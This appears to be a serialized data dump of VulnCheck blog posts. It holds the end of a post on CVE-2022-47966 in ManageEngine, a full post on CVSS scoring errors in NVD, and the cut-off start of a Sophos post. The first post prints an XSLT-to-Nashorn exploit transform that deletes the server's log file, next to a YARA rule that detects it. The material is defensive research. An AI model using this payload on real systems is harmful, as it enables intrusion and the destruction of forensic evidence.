xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n \u003Cxsl:template match=\"\u002F\">\n \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var File = Java.type("java.io.File");\n var log = new File("..\u002Flogs\u002Fserverout1.txt");\n log.delete();')\"\u002F>\n \u003Cxsl:value-of select=\"$out\"\u002F>\n \u003C\u002Fxsl:template>\n \u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110933,110934,110956,110976,110992,111008,111026,111048,111080,111112,111158,111180,111189,111211,111223,111235],{"__ignoreMap":219},[1373,110935,110936,110938,110940,110942,110944,110946,110948,110950,110952,110954],{"class":1375,"line":1376},[1373,110937,11852],{"class":1383},[1373,110939,109306],{"class":6300},[1373,110941,4606],{"class":109775},[1373,110943,109324],{"class":6300},[1373,110945,109327],{"class":8252},[1373,110947,5417],{"class":1383},[1373,110949,183],{"class":1387},[1373,110951,109357],{"class":1391},[1373,110953,183],{"class":1387},[1373,110955,6765],{"class":1383},[1373,110957,110958,110960,110962,110964,110966,110968,110970,110972,110974],{"class":1375,"line":220},[1373,110959,8246],{"class":1383},[1373,110961,109368],{"class":6300},[1373,110963,4606],{"class":109775},[1373,110965,49025],{"class":6300},[1373,110967,45880],{"class":8252},[1373,110969,5417],{"class":1383},[1373,110971,183],{"class":1387},[1373,110973,84878],{"class":1391},[1373,110975,19057],{"class":1387},[1373,110977,110978,110980,110982,110984,110986,110988,110990],{"class":1375,"line":1266},[1373,110979,110156],{"class":8252},[1373,110981,4606],{"class":51986},[1373,110983,109852],{"class":8252},[1373,110985,5417],{"class":1383},[1373,110987,183],{"class":1387},[1373,110989,109859],{"class":1391},[1373,110991,19057],{"class":1387},[1373,110993,110994,110996,110998,111000,111002,111004,111006],{"class":1375,"line":1852},[1373,110995,110156],{"class":8252},[1373,110997,4606],{"class":51986},[1373,110999,109870],{"class":8252},[1373,111001,5417],{"class":1383},[1373,111003,183],{"class":1387},[1373,111005,109877],{"class":1391},[1373,111007,19057],{"class":1387},[1373,111009,111010,111012,111014,111016,111018,111020,111022,111024],{"class":1375,"line":4692},[1373,111011,110156],{"class":8252},[1373,111013,4606],{"class":51986},[1373,111015,109368],{"class":8252},[1373,111017,5417],{"class":1383},[1373,111019,183],{"class":1387},[1373,111021,109433],{"class":1391},[1373,111023,183],{"class":1387},[1373,111025,6765],{"class":1383},[1373,111027,111028,111030,111032,111034,111036,111038,111040,111042,111044,111046],{"class":1375,"line":4724},[1373,111029,85290],{"class":1383},[1373,111031,109368],{"class":6300},[1373,111033,4606],{"class":109775},[1373,111035,30296],{"class":6300},[1373,111037,109910],{"class":8252},[1373,111039,5417],{"class":1383},[1373,111041,183],{"class":1387},[1373,111043,2180],{"class":1391},[1373,111045,183],{"class":1387},[1373,111047,6765],{"class":1383},[1373,111049,111050,111052,111054,111056,111058,111060,111062,111064,111066,111068,111070,111072,111074,111076,111078],{"class":1375,"line":4756},[1373,111051,109442],{"class":1383},[1373,111053,109368],{"class":6300},[1373,111055,4606],{"class":109775},[1373,111057,109931],{"class":6300},[1373,111059,46496],{"class":8252},[1373,111061,5417],{"class":1383},[1373,111063,183],{"class":1387},[1373,111065,109940],{"class":1391},[1373,111067,183],{"class":1387},[1373,111069,109483],{"class":8252},[1373,111071,5417],{"class":1383},[1373,111073,183],{"class":1387},[1373,111075,109951],{"class":1391},[1373,111077,183],{"class":1387},[1373,111079,85355],{"class":1383},[1373,111081,111082,111084,111086,111088,111090,111092,111094,111096,111098,111100,111102,111104,111106,111108,111110],{"class":1375,"line":4768},[1373,111083,109442],{"class":1383},[1373,111085,109368],{"class":6300},[1373,111087,4606],{"class":109775},[1373,111089,109931],{"class":6300},[1373,111091,46496],{"class":8252},[1373,111093,5417],{"class":1383},[1373,111095,183],{"class":1387},[1373,111097,109974],{"class":1391},[1373,111099,183],{"class":1387},[1373,111101,109483],{"class":8252},[1373,111103,5417],{"class":1383},[1373,111105,183],{"class":1387},[1373,111107,109985],{"class":1391},[1373,111109,183],{"class":1387},[1373,111111,85355],{"class":1383},[1373,111113,111114,111116,111118,111120,111122,111124,111126,111128,111130,111132,111134,111136,111138,111141,111143,111145,111147,111150,111152,111154,111156],{"class":1375,"line":4792},[1373,111115,109442],{"class":1383},[1373,111117,109368],{"class":6300},[1373,111119,4606],{"class":109775},[1373,111121,109931],{"class":6300},[1373,111123,46496],{"class":8252},[1373,111125,5417],{"class":1383},[1373,111127,183],{"class":1387},[1373,111129,110008],{"class":1391},[1373,111131,183],{"class":1387},[1373,111133,109483],{"class":8252},[1373,111135,5417],{"class":1383},[1373,111137,183],{"class":1387},[1373,111139,111140],{"class":1391},"se:eval($jsobject,'var File = Java.type(",[1373,111142,7218],{"class":7054},[1373,111144,85318],{"class":2209},[1373,111146,39663],{"class":7054},[1373,111148,111149],{"class":1391},"java.io.File",[1373,111151,7218],{"class":7054},[1373,111153,85318],{"class":2209},[1373,111155,39663],{"class":7054},[1373,111157,4680],{"class":1391},[1373,111159,111160,111163,111165,111167,111169,111172,111174,111176,111178],{"class":1375,"line":4798},[1373,111161,111162],{"class":1391}," var log = new File(",[1373,111164,7218],{"class":7054},[1373,111166,85318],{"class":2209},[1373,111168,39663],{"class":7054},[1373,111170,111171],{"class":1391},"..\u002Flogs\u002Fserverout1.txt",[1373,111173,7218],{"class":7054},[1373,111175,85318],{"class":2209},[1373,111177,39663],{"class":7054},[1373,111179,4680],{"class":1391},[1373,111181,111182,111185,111187],{"class":1375,"line":4806},[1373,111183,111184],{"class":1391}," log.delete();')",[1373,111186,183],{"class":1387},[1373,111188,85355],{"class":1383},[1373,111190,111191,111193,111195,111197,111199,111201,111203,111205,111207,111209],{"class":1375,"line":4817},[1373,111192,109442],{"class":1383},[1373,111194,109368],{"class":6300},[1373,111196,4606],{"class":109775},[1373,111198,110034],{"class":6300},[1373,111200,109483],{"class":8252},[1373,111202,5417],{"class":1383},[1373,111204,183],{"class":1387},[1373,111206,110043],{"class":1391},[1373,111208,183],{"class":1387},[1373,111210,85355],{"class":1383},[1373,111212,111213,111215,111217,111219,111221],{"class":1375,"line":4825},[1373,111214,109601],{"class":1383},[1373,111216,109368],{"class":6300},[1373,111218,4606],{"class":109775},[1373,111220,30296],{"class":6300},[1373,111222,6765],{"class":1383},[1373,111224,111225,111227,111229,111231,111233],{"class":1375,"line":4835},[1373,111226,56557],{"class":1383},[1373,111228,109368],{"class":6300},[1373,111230,4606],{"class":109775},[1373,111232,49025],{"class":6300},[1373,111234,6765],{"class":1383},[1373,111236,111237,111239,111241,111243,111245],{"class":1375,"line":4843},[1373,111238,46627],{"class":1383},[1373,111240,109306],{"class":6300},[1373,111242,4606],{"class":109775},[1373,111244,109324],{"class":6300},[1373,111246,6765],{"class":1383},[18,111248,111249,111250,111252,111253,111258],{},"These are short snippets, but they demonstrate the primitives needed to deploy a more malicious tool. As demonstrated, an XSLT transform that invokes Nashorn has few limits on what it can do on the victim host, while remaining in memory. ",[886,111251,109639],{}," is an inferior solution, especially since open source tooling and ",[47,111254,111257],{"href":111255,"rel":111256},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F01\u002F19\u002Fetr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability\u002F",[51],"reporting"," has told defenders that’s what they should be watching out for.",[18,111260,111261],{},"The only wrinkle is that Velociraptor’s detection will still flag exploitation even when the attacker uses the Nashorn transform. That’s because Velociraptor implemented a simple YARA rule that parses the ManageEngine log file for indicators of compromise:",[1354,111263,111266],{"className":111264,"code":111265,"language":1359,"meta":219},[1357],"rule LOG_EXPL_ManageEngine_CVE_2022_47966_Jan23 {\n meta:\n description = \"Detects Exploitation of Critical ManageEngine Vulnerability: CVE-2022-47966\"\n author = \"Matt Green - @mgreen27\"\n reference = \"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F01\u002F19\u002Fetr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability\u002F\"\n date = \"2023-01-20\"\n strings:\n $s1 = \"com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected\"\n $re1 = \u002Finvalid_response --> .{20,}\u002Fs \u002F\u002FLogging typically contains this string followed by Base64 \u003Csamlp:Response Version=\n \n $ip1 = \"111.68.7.122\"\n $ip2 = \"149.28.193.216\"\n $ip3 = \"172.93.193.64\"\n \n condition:\n any of them\n}\n",[886,111267,111265],{"__ignoreMap":219},[18,111269,111270,111271,1554,111274,111277],{},"To me, this is brilliant and perhaps an ideal solution. As far as I can tell, the attacker can’t prevent ",[886,111272,111273],{},"$s1",[886,111275,111276],{},"$re1"," from being written to the log. The defender wins as long as Velociraptor can acquire the log file before the attacker modifies or deletes it. Of course, that race is sort of a dicey bet for the defender. But it’s better than nothing and goes to show that there is huge value in collecting and parsing log files.",[1920,111279,1903],{"id":1902},[18,111281,111282,111283,111285],{},"The lack of diversity in public exploits can lead to scenarios in which both attackers and defenders are only using or defending against suboptimal exploits. In the case of CVE-2022-47966, we see both attackers and defenders anticipating exploits that use an XSLT transform that ends in ",[886,111284,109639],{}," in order to execute external programs. The reality is that an attacker with only a little knowledge can develop an exploit that follows a completely different path and bypasses most open source detections currently available.",[18,111287,111288,111289,109200],{},"VulnCheck tracks public exploits and their timelines. VulnCheck also develops their own exploits including a version of CVE-2022-47966 that creates a reverse shell with Nashorn. For more information, ",[47,111290,109199],{"href":109197,"rel":111291},[51],[2901,111293,111294],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s7uzT, html code.shiki .s7uzT{--shiki-light:#39ADB5;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sRsjY, html code.shiki .sRsjY{--shiki-light:#39ADB5;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":111296},[111297,111298,111299],{"id":109290,"depth":220,"text":109291},{"id":109653,"depth":220,"text":109654},{"id":109757,"depth":220,"text":109758},"2023-02-14","Exploring a memory resident payload for CVE-2022-47966.",{"slug":111303},"cve-2022-47966-payload","\u002Fblog\u002Fcve-2022-47966-payload",{"title":83481,"description":111301},"blog\u002Fcve-2022-47966-payload",[242],"DlE1sj87MnkYF17q67oQZZMgtAqr9ToiyT5C7WROiP0",{"id":111310,"title":111311,"articles":111312,"authors":111325,"body":111327,"date":111316,"description":111556,"extension":234,"image":7,"link":7,"meta":111557,"navigation":237,"path":111559,"seo":111560,"series":7,"stem":111561,"subtype":7,"tags":111562,"__hash__":111563},"blog\u002Fblog\u002Fcvss-accuracy-issues.md","Who to Trust? National Vulnerability Database CVSS Accuracy Issues - VulnCheck",[111313,111317,111321],{"title":111314,"source":11218,"link":111315,"date":111316},"Discrepancies Discovered in Vulnerability Severity Ratings","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fdiscrepancies-discovered-in-vulnerability-severity-ratings","2023-02-02",{"title":111318,"source":3494,"link":111319,"date":111320},"Risky Biz News: Zero-day alert for GoAnywhere file transfer servers","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-zero-day-alert-for","2023-02-03",{"title":111322,"source":111323,"link":111324,"date":111320},"Week In Review: Auto, Security, Pervasive Computing","Semiconductor Engineering","https:\u002F\u002Fsemiengineering.com\u002Fweek-in-review-auto-security-pervasive-computing-153\u002F",[111326],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":111328,"toc":111554},[111329,111331,111339,111345,111354,111378,111385,111389,111393,111401,111406,111419,111433,111445,111449,111457,111462,111465,111468,111476,111479,111484,111488,111491,111494,111497,111504,111513,111519,111522,111525,111531,111534,111539,111543,111545,111548],[1920,111330,68327],{"id":68326},[18,111332,2245,111333,111338],{},[47,111334,111337],{"href":111335,"rel":111336},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fspecification-document",[51],"Common Vulnerability Scoring System"," (CVSS) is a vulnerability scoring framework that allows security practitioners to determine a vulnerability’s severity on a simple scale: low, medium, high, and critical. The score’s associated CVSS vector often provides much needed context to low-quality CVE descriptions.",[18,111340,111341],{},[68,111342],{":width":10862,"alt":111343,"src":111344},"CVE-2022-34698","\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2022-34689.png",[18,111346,111347,111348,111353],{},"Though the CVSS system has shortcomings, it is widely used throughout the security industry. This is due, in no small part, to the inclusion of a CVSS base score and vector in every entry of the ",[47,111349,111352],{"href":111350,"rel":111351},"https:\u002F\u002Fnvd.nist.gov\u002F",[51],"National Vulnerability Database"," (NVD) maintained by NIST.",[18,111355,111356,111357,111361,111362,111367,111368,1255,111373,111377],{},"Due to their ready availability, CVSS scores and vectors are often used to drive vulnerability prioritization, and are incorporated into more advanced scoring schemes like ",[47,111358,11371],{"href":111359,"rel":111360},"https:\u002F\u002Fwww.first.org\u002Fepss\u002Fmodel#:~:text=Data%20Architecture%20and%20Sources",[51],", Qualys ",[47,111363,111366],{"href":111364,"rel":111365},"https:\u002F\u002Fqualysguard.qg2.apps.qualys.com\u002Fportal-help\u002Fen\u002Fvm\u002Fthreat\u002Fcalculating_asset_risk_score.htm",[51],"TruRisk",", Tenable ",[47,111369,111372],{"href":111370,"rel":111371},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fwhat-is-vpr-and-how-is-it-different-from-cvss",[51],"VPR",[47,111374,111376],{"href":54540,"rel":111375},[51],"SSVC"," (as the impact component).",[18,111379,111380,111381,111384],{},"So, while CVSS isn’t necessarily well loved (or even well understood), it’s a key driver of vulnerability management, as currently practiced by the security industry. However, scores in NVD aren’t always accurate. Incorrect scores impact immeasurable vulnerability management and remediation plans all over the world. Potentially resulting in many wasted hours diverting resources away from the vulnerabilities that ",[295,111382,111383],{},"should"," be prioritized.",[263,111386],{":list":111387,"ico":266,"title":111388},"[\"CVSS scores are a driving force behind vulnerability management and remediation. However, the scores in NVD aren’t always accurate.\",\"At the time of analysis, NVD contained 120,000 CVE with CVSSv3 scores. Of those, almost 25,000 (20%) had primary and secondary scores from NIST and a vendor, and approximately 14,000 (56%) of those had conflicting scores.\",\"VulnCheck analyzed CVE that had been assigned the CWE for XSS or CSRF to ensure their \\\"user interaction\\\" field had been properly set, and found the error rate for the primary source was 1.10% and the error rate for the secondary source was 15.03%.\",\"There are over 39 unique organizations contributing erroneous scores in the NVD.\",\"There is reason to believe errors in NIST’s CVSS scoring could have a negative impact on organizations that rely on NVD, directory or indirectly, for accurate information.\"]","Who to Trust? National Vulnerability Database CVSS Accuracy Issues",[1920,111390,111392],{"id":111391},"cvss-scoring-errors-in-nvd","CVSS Scoring Errors in NVD",[18,111394,111395,111396,59],{},"As a quick example, consider ",[47,111397,111400],{"href":111398,"rel":111399},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-36446",[51],"CVE-2022-36446",[18,111402,111403],{},[68,111404],{":width":10862,"alt":111400,"src":111405},"\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2022-36446.png",[18,111407,111408,111409,111414,111415,111418],{},"CVE-2022-36446 is a command injection vulnerability affecting ",[47,111410,111413],{"href":111411,"rel":111412},"https:\u002F\u002Fwww.webmin.com\u002F",[51],"Webmin",". Webmin is no stranger to mass exploitation. It has an entry in the ",[47,111416,30055],{"href":2864,"rel":111417},[51]," (KEV) Catalog, and has been known to be exploited by botnets like Echobot and Sysrv.",[18,111420,111421,111422,111426,111427,111432],{},"CVE-2022-36466 has an associated ",[47,111423,32281],{"href":111424,"rel":111425},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F06f0fffc20f83f7eb31dc34cf63573c8ef36f19f\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fwebmin_package_updates_rce.rb",[51]," and nice ",[47,111428,111431],{"href":111429,"rel":111430},"https:\u002F\u002Fmedium.com\u002F@emirpolat\u002Fcve-2022-36446-webmin-1-997-7a9225af3165",[51],"technical writeup"," by the vulnerability discoverer. At face value, this critical (this according to NIST) vulnerability appears to be an obvious one to prioritize for remediation.",[18,111434,111435,111436,111438,111439,111444],{},"However, NIST has assigned this CVE an incorrect CVSSv3 score. CVE-2022-36446 is ",[295,111437,6881],{}," a critical vulnerability as it requires authentication. Correcting NIST’s CVSS vector drops the score from 9.8 (critical) to ",[47,111440,111443],{"href":111441,"rel":111442},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fcalculator\u002F3.1#CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H",[51],"7.2"," (high). This drop in score makes CVE-2022-36446 significantly less of a priority.",[1920,111446,111448],{"id":111447},"thousands-of-primary-and-secondary-score-sources-disagree","Thousands of Primary and Secondary Score Sources Disagree",[18,111450,111451,111452,4606],{},"Of course, that’s just one example from the 200,000 vulnerabilities in NVD. One off mistakes are bound to happen at that scale, and that’s understandable. More interesting to us is the potential for a large number of errors. The following is the NVD entry for ",[47,111453,111456],{"href":111454,"rel":111455},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-21557",[51],"CVE-2023-21557",[18,111458,111459],{},[68,111460],{":width":10862,"alt":111456,"src":111461},"\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2023-21557.png",[18,111463,111464],{},"Above you can see two different CVSS scores for the same vulnerability. The primary score, calculated by NIST, is 9.1 (critical), and the secondary score, calculated by Microsoft, is 7.5 (high). No information is provided on why the scores differ, but NIST has chosen to assign itself as the primary and default score. Does NIST know better than Microsoft on this matter? Maybe. It seems unlikely, but without additional information it’s difficult to say.",[18,111466,111467],{},"This is not a unique situation. At the time of analysis, NVD contained 120,000 CVE with CVSSv3 scores.",[22,111469,111470,111473],{},[25,111471,111472],{},"Of those, almost 25,000 (20%) had primary and secondary scores like the ones pictured above.",[25,111474,111475],{},"56% of that group had conflicting primary and secondary scores.",[18,111477,111478],{},"That very high conflict rate easily leads practitioners to question whether to trust the primary or secondary source. Primary, based on the name, certainly sounds more authoritative. But it turns out, NIST almost always assigns itself as the primary source. Of the 14 total primary sources found in the 120,000 CVE with CVSSv3 scores, NIST was listed as the primary source 116,169 times (97%).",[1925,111480,111481],{},[18,111482,111483],{},"Primary CVSS Source for CVE with CVSSv3 Scores",[11128,111485],{":labels":111486,":values":111487},"[\"info@cert.vde.com\",\"nvd@nist.gov\",\"product-security@qualcomm.com\",\"psirt@adobe.com\",\"psirt@nvidia.com\",\"psirt@paloaltonetworks.com\",\"report@snyk.io\",\"secalert_us@oracle.com\",\"secure@microsoft.com\",\"1security-advisories@github.com\",\"security@wordfence.com\",\"sirt@juniper.net\",\"twcert@cert.org.tw\",\"vulnerabilitylab@mend.io\"]","[85,116169,25,646,22,14,54,1123,857,77,34,167,137,33]",[18,111489,111490],{},"Undoubtedly, NIST has expertise in vulnerability scoring, but claiming the overwhelming majority of primary scores, even in the presence of other conflicting secondary scores, does make us wonder which score is more likely to be accurate.",[18,111492,111493],{},"Is the NIST generated score really the correct one to use 97% of the time?",[18,111495,111496],{},"Or might the score generated by the organizations in charge of the vulnerable software be more reliable?",[18,111498,111499,111500,111503],{},"To answer this, we dug a little deeper. Some vulnerabilities have elements of their CVSSv3 vector that must be set to specific values. For example, both XSS and CSRF vulnerabilities ",[295,111501,111502],{},"always"," require user interaction. Therefore, the CVSSv3 vector for these vulnerabilities must always contain UI:R (user interaction required).",[18,111505,111506,111507,111512],{},"To determine if a CVE is a CSRF or XSS vulnerability, we extracted the vulnerabilities’ ",[47,111508,111511],{"href":111509,"rel":111510},"https:\u002F\u002Fcwe.mitre.org\u002F",[51],"CWE-ID"," from NVD.",[18,111514,111515],{},[68,111516],{":width":10862,"alt":111517,"src":111518},"CVE with two sources","\u002Fblog\u002Fcvss-accuracy-issues\u002Ftwo-sources.png",[18,111520,111521],{},"Of the 120,000 CVE entries with CVSSv3 scores, we found 12,969 vulnerabilities had been assigned an XSS CWE by the primary source and 2,091 vulnerabilities were assigned XSS CWE by a secondary source. The primary source failed to use UI:R for XSS vulnerabilities 111 times, a 0.86% error rate. Whereas the secondary sources failed to use UI:R 346 times, a 16.54% error rate.",[18,111523,111524],{},"CSRF was less severe. The primary source only failed to use UI:R for 59 out of 2,548 (2.3%) CSRF vulnerabilities. The secondary source used the wrong UI for 27 out of 390 (6.9%)",[18,111526,111527,111528,111530],{},"The primary source (typically NIST) has the lower error rate, but it remains higher than you’d expect for a scoring element that can be checked and verified programmatically. The secondary sources error rate is quite bad at nearly 17%. In this case, it appears that NVD ",[295,111529,5650],{}," the preferred source. Although that doesn’t necessarily translate to other vulnerability types.",[18,111532,111533],{},"The error rates were higher than we expected, which got us thinking, “Who is making these errors?” We mapped the errors to their sources and found 39 unique organizations contributed erroneous scores. The top five incorrect score sources can be found in the following graph:",[1925,111535,111536],{},[18,111537,111538],{},"Top Sources of XSS and CSRF CVE Incorrectly using CVSSv3 UI:N",[11128,111540],{":labels":111541,":values":111542},"[\"nvd@nist.gov\",\"security@huntr.dev\",\"security@wordfence.com\",\"security-advisories@github.com\",\"pics-cert@hq.dhs.gov\"]","[169,134,70,50,17]",[1920,111544,1903],{"id":1902},[18,111546,111547],{},"CVSS scores are a driving force behind vulnerability management and remediation. Typically, the scores are sourced from NIST’s NVD. Therefore, the accuracy of the scores in NVD are an important factor in the database’s overall usefulness. There is reason to believe that there is a non-negligible error rate in NIST’s CVSS scoring which could have a negative impact on organizations that rely on NVD, directly or indirectly, for accurate information.",[18,111549,111550,111551,109200],{},"VulnCheck maintains a list of corrected CVSS scores. For more information, ",[47,111552,109199],{"href":111553},"\u002Fregister",{"title":219,"searchDepth":220,"depth":220,"links":111555},[],"The National Vulnerability Database contains thousands of CVSS vectors. How accurate are those vectors and does accuracy matter?",{"slug":111558},"cvss-accuracy-issues","\u002Fblog\u002Fcvss-accuracy-issues",{"title":111311,"description":111556},"blog\u002Fcvss-accuracy-issues",[1280],"-Y68WOTtDmdMQFxiv-vqt5anWfc6jz2vpRa-tuBaYYs",{"id":111565,"title":111566,"articles":111567,"authors":111603,"body":111605,"date":112211,"description":112212,"extension":234,"image":7,"link":7,"meta":112213,"navigation":237,"path":112215,"seo":112216,"series":7,"stem":112217,"subtype":7,"tags":112218,"__hash__":112219},"blog\u002Fblog\u002Fsophos-cve-2022-3236.md","Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236 Blog - VulnCheck",[111568,111572,111575,111579,111582,111586,111589,111593,111596,111600],{"title":111569,"source":85794,"link":111570,"date":111571},"More than 4,400 Sophos firewall servers remain vulnerable to critical exploits","https:\u002F\u002Farstechnica.com\u002Finformation-technology\u002F2023\u002F01\u002Fmore-than-4400-sophos-firewall-servers-remain-vulnerable-to-critical-exploits\u002F","2023-01-17",{"title":111573,"source":14373,"link":111574,"date":111571},"Over 4,000 Sophos Firewall devices vulnerable to RCE attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-4-000-sophos-firewall-devices-vulnerable-to-rce-attacks\u002F",{"title":111576,"source":111577,"link":111578,"date":111571},"Over 4,000 Sophos firewall servers still vulnerable to code injection vulnerability","Computing","https:\u002F\u002Fwww.computing.co.uk\u002Fnews\u002F4062871\u002Fsophos-firewall-servers-vulnerable-code-injection-vulnerability",{"title":111580,"source":3494,"link":111581,"date":111571},"Risky Biz News: Google Search and Ads have a major malware problem","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-google-search-and?utm_source=substack&utm_medium=email",{"title":111583,"source":12153,"link":111584,"date":111585},"Thousands of Sophos Firewall devices at risk of RCE attacks","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fdevice-security\u002Fthousands-of-sophos-firewall-devices-at-risk-of-rce-attacks","2023-01-18",{"title":111587,"source":93312,"link":111588,"date":111585},"Thousands of Sophos servers are vulnerable to this dangerous exploit","https:\u002F\u002Fwww.techradar.com\u002Fnews\u002Fthousands-of-sophos-servers-are-vulnerable-to-this-dangerous-exploit",{"title":111590,"source":111591,"link":111592,"date":111585},"About 6% of Internet-Facing Sophos Firewalls Are Exposed to Critical Exploit, Expert Warns","TechTimes","https:\u002F\u002Fwww.techtimes.com\u002Farticles\u002F286405\u002F20230118\u002F6-internet-facing-sophos-firewalls-exposed-critical-exploit-expert-warns.htm",{"title":111594,"source":3481,"link":111595,"date":111585},"Thousands of Sophos firewalls still vulnerable out there to hijacking","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F01\u002F18\u002F4000_buggy_sophos_firewalls\u002F",{"title":111597,"source":84069,"link":111598,"date":111599},"EOL Sophos firewalls get hotfix for old but still exploited vulnerability (CVE-2022-3236)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F12\u002F13\u002Feol-sophos-firewalls-cve-2022-3236\u002F","2023-12-13",{"title":111601,"source":14390,"link":111602,"date":111599},"SOPHOS BACKPORTS FIX FOR CVE-2022-3236 FOR EOL FIREWALL FIRMWARE VERSIONS DUE TO ONGOING ATTACKS","https:\u002F\u002Fsecurityaffairs.com\u002F155746\u002Fsecurity\u002Fsophos-backports-cve-2022-3236-patch.html",[111604],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":111606,"toc":112209},[111607,111609,111629,111632,111636,111655,111661,111673,111679,111682,111686,111701,111707,111716,111721,111725,111730,111734,111739,111743,111746,111748,111754,111757,112159,112169,112175,112181,112185,112188,112193,112196,112198,112201,112206],[1920,111608,68327],{"id":68326},[18,111610,111611,111612,111617,111618,111622,111623,111628],{},"Sophos took immediate steps to remediate 